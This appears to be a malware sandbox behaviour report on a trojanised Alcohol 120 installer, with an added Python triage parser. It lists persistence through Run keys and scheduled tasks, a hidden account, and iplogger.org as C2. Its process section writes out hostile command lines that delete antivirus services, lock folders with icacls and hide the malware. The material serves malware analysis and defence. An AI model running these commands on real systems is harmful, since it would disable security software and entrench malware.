N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\RealtekHD\taskhostw.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
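The three registry-based signature tables in this detonation (the Windows Defender Real-Time Protection policy values, the Explorer DisallowRun list, and the Winlogon SpecialAccounts\UserList entry for "John") share one row format, and the 32-bit update.exe writes each value twice, once under WOW6432Node. The Python below is an added triage example, not part of the sandbox report or of the sample: it parses a constructed subset of those rows copied from the tables above, folds the WOW6432Node duplicates onto the 64-bit key, and returns which protections were disabled, which executables were blocked and which accounts were hidden. The key-path substrings used as anchors and the output field names are the example's own choice.

```python
import re

# Constructed input: a subset of the "Set value" / "Key created" rows from the
# behavioral2 signature tables, copied verbatim from the report.
SAMPLE_ROWS = r'''
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
'''

# One "Set value" row: type, key path, quoted data, writing process, target.
SET_VALUE = re.compile(
    r'^Set value \((?P<type>int|str)\) (?P<key>.+?) = "(?P<data>[^"]*)" '
    r'(?P<proc>\S+) (?P<target>\S+)$'
)

# Lower-cased key-path anchors (WOW6432Node already removed) for each technique.
# These are this example's own choice, not a vendor rule set.
DEFENDER_RTP = "\\windows defender\\real-time protection\\"
DISALLOW_RUN_ENTRY = "\\policies\\explorer\\disallowrun\\"
DISALLOW_RUN_TOGGLE = "\\policies\\explorer\\disallowrun"
USERLIST = "\\winlogon\\specialaccounts\\userlist\\"


def normalize_key(key: str) -> str:
    """Fold the 32-bit registry view onto the 64-bit one so the pair of
    writes a 32-bit process produces counts as one logical setting."""
    return re.sub(r"\\WOW6432Node", "", key, flags=re.IGNORECASE)


def classify(rows: str) -> dict:
    """Return the protections disabled, executables blocked and accounts
    hidden by the "Set value" rows in `rows`, plus the writing processes."""
    defender, blocked, hidden, writers = set(), set(), set(), set()
    disallow_enabled = False
    for line in rows.strip().splitlines():
        m = SET_VALUE.match(line.strip())
        if not m:
            continue  # "Key created" rows carry no data; nothing to classify
        key = normalize_key(m["key"])
        low = key.lower()
        name = key.rsplit("\\", 1)[-1]  # last path component = value name
        data = m["data"]
        if DEFENDER_RTP in low and data == "1":
            defender.add(name)           # e.g. DisableBehaviorMonitoring
        elif DISALLOW_RUN_ENTRY in low and name.isdigit():
            blocked.add(data)            # numbered entries hold the exe name
        elif low.endswith(DISALLOW_RUN_TOGGLE) and data == "1":
            disallow_enabled = True      # the policy switch itself
        elif USERLIST in low and data == "0":
            hidden.add(name)             # UserList\<account> = 0 hides it
        else:
            continue
        writers.add(m["proc"])
    return {
        "defender_disabled": sorted(defender),
        "disallow_run_enabled": disallow_enabled,
        "disallow_run": sorted(blocked),
        "hidden_accounts": sorted(hidden),
        "writers": sorted(writers),
    }


if __name__ == "__main__":
    for name, value in classify(SAMPLE_ROWS).items():
        print(f"{name}: {value}")
```

Two caveats when reading the output on a real host. The Policies\...\Real-Time Protection values are exactly the settings Defender tamper protection is built to ignore, so on a tamper-protected machine their presence shows intent rather than proving real-time protection was off; confirm against Defender's own operational event log before treating the host as unprotected. The UserList\John = 0 entry only hides the account from the logon screen and Control Panel, so a hunt should enumerate local accounts directly rather than trust the UI.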

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1672 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1672 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 2912 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2912 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4868 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 4868 wrote to memory of 548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1380 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1380 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1248 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1248 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4996 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Setup\taskhost.exe

C:\ProgramData\Setup\taskhost.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

